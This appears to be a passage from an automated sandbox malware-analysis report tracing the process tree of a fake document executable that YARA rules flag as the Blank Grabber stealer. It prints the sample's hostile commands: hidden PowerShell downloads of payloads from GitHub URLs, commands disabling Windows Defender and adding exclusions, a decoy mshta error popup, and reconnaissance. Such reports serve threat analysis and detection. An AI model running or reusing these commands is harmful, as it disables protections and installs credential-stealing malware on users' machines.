                                                                                                                                                                                                                                      2024-12-05 18:37:21 UTC16384OUTData Raw: 66 ab 0a ef 5d 14 8f 3c 22 27 24 e2 9a c4 6c 22 c2 5e 48 c7 f0 cd 16 bf 31 dc 00 0e b2 00 8a d5 f2 86 2d 41 70 e7 d2 bf a6 a4 56 55 2d 70 fb df f7 c3 1b dd 52 29 e5 69 8c f1 0c e6 34 b3 f0 0d 16 df f8 87 2a 23 24 84 65 81 ff fa 4c b6 e1 c5 f3 2e 1b bc 97 3a 49 3f 4e 4d 32 ec 7e 4b c5 f0 dd 14 cd 7e f4 87 61 ce ab a4 ed 8a d4 e4 03 70 fb a3 5a f5 39 45 7f e5 51 8c c9 d1 ce 33 d6 cf d5 e4 be a7 39 2d d2 e0 02 68 59 5c e6 6a 24 0f 64 ad 42 96 b1 b0 8a 48 f9 ae 89 15 a9 f1 7b d8 b6 99 1b 1c 16 0f fa 60 d8 1a 2a ac f8 9e 60 32 33 87 d3 31 d2 86 14 9e 50 8b 27 29 b1 d7 32 75 ce 76 2e 57 4b 58 04 bd 27 2a 6c ee 39 28 cb df b2 09 cb 51 e8 81 9f 37 b0 f8 5e 5c fd e1 44 3e 5b 1f c2 7a 94 05 0f 5d 78 04 bd c8 f3 e9 3a a7 15 bd d0 84 84 85 6a 92 87 78 17 92 b1 26 65
                                                                                                                                                                                                                                      Data Ascii: f]<"'$l"^H1-ApVU-pR)i4*#$eL.:I?NM2~K~apZ9EQ39-hY\j$dBH{`*`231P')2uv.WKX'*l9(Q7^\D>[z]x:jx&e
                                                                                                                                                                                                                                      2024-12-05 18:37:23 UTC1255INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 05 Dec 2024 18:37:23 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: __dcfduid=f7c1be10b33711ef9922c6e1f182ee8e; Expires=Tue, 04-Dec-2029 18:37:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                      x-ratelimit-limit: 5
                                                                                                                                                                                                                                      x-ratelimit-remaining: 4
                                                                                                                                                                                                                                      x-ratelimit-reset: 1733423844
                                                                                                                                                                                                                                      x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2BocHF7fex3lZNAH0vGrnvGKMo9eNSr9wk9dUbqjZ1SYQ%2BmKDpp6sftkyiF60IhWuMMtrfb17xpZl32hL4kP5q5RVdBMQEAX6IH%2B%2FyMA5LTnm1jRT5ISRwx7G2VD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                      Set-Cookie: __sdcfduid=f7c1be10b33711ef9922c6e1f182ee8ec7933202cef54feeef1d1246689f0ab3e9c99fd324709db077da4d9929cfe820; Expires=Tue, 04-Dec-2029 18:37:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax


                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:13:36:11
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:100'864 bytes
                                                                                                                                                                                                                                      MD5 hash:24FFDA8B313B8867568168889EDA370F
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                      Start time:13:36:12
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe""
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                      Start time:13:36:12
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                      Start time:13:36:12
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"
                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                      Start time:13:36:23
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"
                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                      Start time:13:36:35
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                      Start time:13:36:42
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\calc.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:calc.exe
                                                                                                                                                                                                                                      Imagebase:0x7ff745630000
                                                                                                                                                                                                                                      File size:27'648 bytes
                                                                                                                                                                                                                                      MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                      Start time:13:36:42
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
                                                                                                                                                                                                                                      Imagebase:0x7ff7ba520000
                                                                                                                                                                                                                                      File size:4'099'584 bytes
                                                                                                                                                                                                                                      MD5 hash:94675EB54AC5DAA11ACE736DBFA9E7A2
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                      Start time:13:36:42
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                      Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                      File size:21'312 bytes
                                                                                                                                                                                                                                      MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                      Start time:13:36:42
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                      Start time:13:36:45
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:chost.exe
                                                                                                                                                                                                                                      Imagebase:0x7ff694360000
                                                                                                                                                                                                                                      File size:8'652'434 bytes
                                                                                                                                                                                                                                      MD5 hash:78F52BE4313947325B63CDB27B35C6DC
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000010.00000003.2023955880.0000025C3C156000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000010.00000003.2023955880.0000025C3C158000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                      Start time:13:36:48
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:chost.exe
                                                                                                                                                                                                                                      Imagebase:0x7ff694360000
                                                                                                                                                                                                                                      File size:8'652'434 bytes
                                                                                                                                                                                                                                      MD5 hash:78F52BE4313947325B63CDB27B35C6DC
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2371288192.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2367455038.0000016E17B2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000002.2372251589.0000016E16DBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2047803547.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                      Start time:13:36:51
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                      Start time:13:36:51
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                      Start time:13:36:51
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                      Start time:13:36:51
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()""
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                      Start time:13:36:51
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                      Start time:13:36:51
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                      Start time:13:36:51
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()"
                                                                                                                                                                                                                                      Imagebase:0x7ff7d9d20000
                                                                                                                                                                                                                                      File size:14'848 bytes
                                                                                                                                                                                                                                      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                      Start time:13:36:51
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                      Start time:13:36:51
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                      Start time:13:36:52
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                      Start time:13:36:52
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                      Start time:13:36:52
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                      Imagebase:0x7ff79c5e0000
                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                                                      Start time:13:36:53
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                      Imagebase:0x7ff6ac500000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:31
                                                                                                                                                                                                                                      Start time:13:36:53
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                                                      Start time:13:36:53
                                                                                                                                                                                                                                      Start date:05/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                      Imagebase:0x7ff719d10000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                      Start time:13:36:57
                                                                                                                                                                                                                                      Start date:05/12/2024
